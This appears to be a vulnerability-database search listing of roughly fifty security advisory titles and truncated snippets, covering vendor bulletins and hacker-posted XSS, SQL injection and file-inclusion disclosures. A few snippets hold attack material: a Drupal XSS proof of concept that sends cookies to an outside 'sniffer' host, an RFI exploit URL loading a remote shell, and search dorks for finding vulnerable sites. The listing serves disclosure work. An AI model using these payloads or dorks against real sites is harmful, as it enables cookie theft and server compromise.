47153 matches found
APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004 OS X Yosemite 10.10.3 and Security Update 2015-004 are now available and address the following: Admin Framework Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A process may gain...
Cosmoshop - XSS on Admin-Login Mask
author: l0om page: l0om.org date: 14.02.2015 Cosmoshop is a simple webshop designed for the german market. There is a simple XSS flaw at the admin-login panel in probably all cosmoshop versions. The admin login can be found at http://www.shop-site.de/cgi-bin/cosmoshop/admin/index.cgi This page wi...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
Oracle / Sun / MySQL / PeopleSoft / OpenJDK applications multiple security vulnerabilities
Quarterly update fixes 144 different vulnerabilities...
TEMENOS T24 R07.03 Reflected Cross-Site Scripting
TEMENOS T24 R07.03 reflected cross-site scripting Class: Input Validation Error Remote: Yes Local: No Published: 26/06/2012 Credit: Raymond Rizk of Dionach Limited [email protected] Vulnerable: TEMENOS T24 R07.03 TEMENOS T24 is prone to a reflected cross-site scripting vulnerability because it...
security advisory: AirDroid 1.0.4 beta
Dear Sir or Madam, we'd like to publish the following advisory. Thanks in advance. TC-SA-2012-02: Several weaknesses in implementation of security features in AirDroid 1.0.4 beta Published: 2012/07/12 Advisory-Version: 1.0 Affected products: AirDroid 1.0.4 beta References: TC-SA-2012-02...
Muzedon (dettaglio.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Muzedon dettaglio.php?id AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Persian Gulf 4 Ever! Dork : "Powered By Muzedon.com" "inurl:dettaglio.php?id=" Exploite:...
Web Fusion Nepal (tour.php?category) XSS Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD XSS Vulnerability Web Fusion Nepal tour.php?category AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://webfusion.com.np/ Persian Gulf 4 Ever! Dork : "Powered by: Web Fusion Nepal" "inurl:tour.php?category="...
PHP directory traversal
Directory traversal in RFC 1867 files upload...
Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak
Title: Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak Author: 3APA3A, http://securityvulns.com Affected: Microsoft Windows 2000,XP,2003,Vista Exploitable: Yes Type: Remote from local network, authentication required NULL session was not tested. Class: Information leak...
PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability
PhotoCart 3.9 adminprint.php Remote File Include Vulnerability Script site: http://www.picturespro.com/store/programs/129-photocart.html Dork : inurl :/PhotoCart/ Bug Found By : irvian GreetZ: jipank,kacung,trangkil,ibnusina,cah|gemblunkz,zoid Special greetz: patihack hitamputih nyubicrew bug fou...
wp-04-0001: Multiple Browser Cookie Injection Vulnerabilities
Westpoint Security Advisory --------------------------- Title: Multiple Browser Cookie Injection Vulnerabilities Risk Rating: Low Software: Multiple Web Browsers Platforms: Unix and Windows Author: Paul Johnston [email protected] assisted by Richard Moore [email protected] Date: 15...
[CVE-2014-8338] Cross Site Scripting (XSS) vulnerability in videowhisper
Hello, Cross Site Scripting XSS vulnerability exists in videowhisper module for Drupal 7. Vendor Notification: 22, Oct 2014 Vulnerable file: drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/specialtextscroller.php POC:...
[security bulletin] HPSBMU03029 rev.1 - HP Insight Control Server Migration running OpenSSL, Remote Disclosure of Information
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04268240 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04268240 Version: 1 HPSBMU03029 rev....
[SECURITY] [DSA 2797-1] chromium-browser security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2797-1 [email protected] http://www.debian.org/security/ Michael Gilbert November 16, 2013 http://www.debian.org/security/faq -...
Cross-Site Scripting vulnerabilities in SimpGB
Здравствуйте 3APA3A! Сообщаю вам о найденных мною Cross-Site Scripting persistent XSS уязвимостях в SimpGB. Ранее я уже сообщал о других уязвимостях в SimpGB http://securityvulns.ru/news/CGI/2009.11.19.html. XSS: Это Persistent XSS в трёх функционалах веб приложения. POST запрос на страницах:...
MULTIPLE SQL INJECTION VULNERABILITIES -- Online Grades & Attendance v-3.2.6 -->
---------------------------------------------------------------------------------- MULTIPLE SQL INJECTION VULNERABILITIES -- Online Grades & Attendance v-3.2.6 -- ---------------------------------------------------------------------------------- CMS INFORMATION: --WEB: http://www.onlinegrades.org...
MODx CMS Source code disclosure, local file inclusion
WwW.BugReport.ir AmnPardaz Security Research Team Title: MODx CMS Vulnerabilities Vendor: http://modxcms.com Bugs: Source code disclosure, local file inclusion Vulnerable Version: 0.9.6.1 prior versions also may be affected Exploitation: Remote with browser Fix Available: No! - Description: quote...
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
MySpeach <= v3.0.2 (my_ms[root]) Remote File Inclusion Exploit
============================================================================================== MySpeach = v3.0.2 mymsroot Remote File Inclusion Exploit =============================================================================================== Critical Level : Very Dangerous Venedor site :...
Symantec Veritas NetBackup network backup system buffer overflow
Java User Interface bpjava-msvc daemon TCP/13722 buffer overflow on COMMANDLOGONTOMSERVER request...
memberlist.php of vBulletin
vBulletin ALL versions Vendor status: notified 3/18/2; no response Within the first few lines of code in memberlist.php, the variable $letterbits is evaled. Because of the way PHP initializes variables, we can inject HTML, or JavaScript into the document. So by directing a user to, for example:...
MDKSA-2001:028 - slrn update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Linux-Mandrake Security Update Advisory Package name: slrn Date: March 9th, 2001 Advisory ID: MDKSA-2001:028 Affected versions: 6.0, 6.1, 7.0, 7.1, 7.2, Corporate Server 1.0.1 Problem Description: A buffer overflow exists in versions of the slrn news...
[ MDVSA-2014:213 ] curl
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:213 http://www.mandriva.com/en/support/security/ Package : curl Date : November 18, 2014 Affected: Business Server 1.0 Problem Description: Updated curl packages fix security vulnerability: Symeon Paraschoud...
[KIS-2014-08] OpenCart <= 1.5.6.4 (cart.php) PHP Object Injection Vulnerability
----------------------------------------------------------------- OpenCart = 1.5.6.4 cart.php PHP Object Injection Vulnerability ----------------------------------------------------------------- - Software Link: http://www.opencart.com/ - Affected Versions: Version 1.5.6.4 and prior versions. -...
[SECURITY] CVE-2014-0075 Apache Tomcat denial of service
CVE-2014-0075 Denial of Service Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Apache Tomcat 8.0.0-RC1 to 8.0.3 - Apache Tomcat 7.0.0 to 7.0.52 - Apache Tomcat 6.0.0 to 6.0.39 Description: It was possible to craft a malformed chunk size as part of a chucked reques...
[security bulletin] HPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04236062 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04236062 Version: 1 HPSBMU02994 rev....
Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities
Memory corruption, use-after-free, privilege escalation, information leakage...
Android Browser Cross-Application Scripting (CVE-2011-2357)
============================================================= Android Browser Cross-Application Scripting CVE-2011-2357 ============================================================= 1 Background -------------- Android applications are executed in a sandbox environment, to ensure that no applicati...
[SECURITY] [DSA 2166-1] chromium-browser security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2166-1 [email protected] http://www.debian.org/security/ Giuseppe Iuculano February 16, 2011 http://www.debian.org/security/faq -...
Artofdefence Hyperguard Web Application Firewall: Remote Denial of Service
Security Advisory --------------------------------------- Vulnerable Software: Artofdefence Hyperguard Web Application Firewall Vulnerable Version: 3 branches: prior to 3.1.1-11637; prior to 3.0.3-11636; prior to 2.5.5-11635 Apache Plug-in Homepage: http://www.artofdefence.com/ Found by: Michael...
[SECURITY] CVE-2009-0781 XSS in Apache Tomcat examples web application
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2009-0781: Apache Tomcat cross-site scripting vulnerability Severity: low Vendor: The Apache Software Foundation Versions Affected: Tomcat 6.0.0 to 6.0.18 Tomcat 5.5.0 to 5.5.27 Tomcat 4.1.0 to 4.1.39 Description: The calendar application in the...
Drupal reflected XSS
PoC: HTML TITLEDrupal reflected XSS by etteeitdefence.ru/TITLE!-- Full HTML =on ""scriptimg = new Image; img.src = "http://sniffer/image/s.gif?"+document.cookie;/script --BODY onload="p.submit" form action="http://freelanguage.org/comment/reply/532/1263"!--target-- method="post" id="p" input...
PmWiki Multiple Vulnerabilities
This is both a PmWiki and PHP advisory, and works only with registerglobals on. I totally missed the PHP GLOBALS GPC injection vulnerability and rediscovered that by my own if just few month before! arg!. Basically in the worst scenario be are in front of two separate vulnerabilities: one regardi...
Easy Message Board Directory Traversal and Remote Command
============================================================ ============================================================ Title: Easy Message Board Directory Traversal and Remote Command Execution Vulnerability discovery: SoulBlack - Security Research - http://soulblack.com.ar Date: 08/05/2005...
AIX 5.1/5.2/5.3 local root exploits
hi, i found some local security holes in IBM's AIX versions 5.1, 5.2 and 5.3 unix for IBM RS/6000 powerpc. 1 the first is a bug in all setuid diag related tools that use an environment variable as a prefix to an external binary executed as root. 2 the second is a classical stack overflow in a too...
[Full-Disclosure] [waraxe-2004-SA#033 - Multiple security holes in PhpNuke - part 1]
================================================================================ waraxe-2004-SA033 ================================================================================ Multiple security holes in PhpNuke - part 1...
Elevation of privileges with debug registers on Win2K
Georgi Guninski security advisory 45, 2001 Elevation of privileges with debug registers on Win2K Systems affected: Win2K, Win2K SP1 have not tested on Win2K SP2 but according to Microsoft SP2 fixes this Risk: High Date: 24 May 2001 Legal Notice: This Advisory is Copyright c 2001 Georgi Guninski...
DST2K0023: Directory Traversal Possible & Denial of Service in Wo rm HTTP Server
============================================================================ Delphis Consulting Plc ============================================================================ Security Team Advisories 25/08/2000 [email protected] http://www.delphisplc.com/thinking/whitepapers/...
Re: Snort 1.6 and nmap 2.54beta1
From the BUGS file distributed with Snort: ------------------------------------------------------------------------- Bug reports should be sent to [email protected] Please include the following information with your report: System Architecture Sparc, x86, etc Operating System and version Linux...
Apple iOS multiple security vulnerabilities
Screen unlock, information disclosure, restrictions bypass, multiple memory corruptions, weak encryption, multiple vulnerabilities in different libraries...
APPLE-SA-2014-04-22-4 AirPort Base Station Firmware Update 7.7.3
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-04-22-4 AirPort Base Station Firmware Update 7.7.3 AirPort Base Station Firmware Update 7.7.3 is now available and addresses the following: Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: An...
XSS vulnerability in Habari
Vulnerability ID: HTB22731 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinhabari.html Product: Habari Vendor: Habari http://habariproject.org/en/ Vulnerable Version: 0.6.5 Vendor Notification: 02 December 2010 Vulnerability Type: XSS Cross Site Scripting Status: Fixed by Vendor Risk...
[SECURITY] CVE-2010-4172: Apache Tomcat Manager application XSS vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2010-4172: Apache Tomcat Manager application XSS vulnerability Severity: Tomcat 7.0.x - Low, Tomcat 6.0.x - Moderate Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.4 - Not affected in default configuration. -...
BitTorrent / uTorrent buffer overflow
Buffer overflow on peer information displaying...
HTMLeditbox & 2.2 >> RFI
+++++++ name & version :HTMLeditbox & 2.2 vendor: http://www.labs4.com by : www.hackerz.ir userz,s3rv3rhack3r,saeidonlylinux,dNetGuru bug : editor.php @include$settingsappdir.'/inc/config.php'; exploit : http://victim/editor.php?settingsappdir=http://shell ++++++...
Admin Phorum 3.3.1.a (del.php include_path)File Include Vulnerability
Admin Phorum 3.3.1.a del.php includepathFile Include Vulnerability Author: GoldM Hacker at w.Cn Mahmoodali Homepage: Www.Tryag.Cc Download S : http://www.phpforums.net/admin331.zip Other Info : http://www.phpforums.net/index.php?dir=dld v.Code : Line 3 require "$includepath/deletemessage.php";...
Security Bulletin (MS00-036)
Microsoft Security Bulletin MS00-036 - -------------------------------------- Patch Available for "ResetBrowser Frame" and "HostAnnouncement Flooding" Vulnerabilities Originally posted: May 25, 2000 Summary ======= Microsoft has released a patch that eliminates two security vulnerabilities, one...
CVE-2015-3269 Apache Flex BlazeDS Insecure Xml Entity Expansion Vulnerability
CVE-2015-3269 Apache Flex BlazeDS Insecure Xml Entity Expansion Vulnerability Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache Flex BlazeDS 4.7.0 Description: When receiving XML encoded AMF messages containing DTD entities, the default XML parser configurations...
[SECURITY] [DSA 3280-1] php5 security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3280-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff June 07, 2015 http://www.debian.org/security/faq -...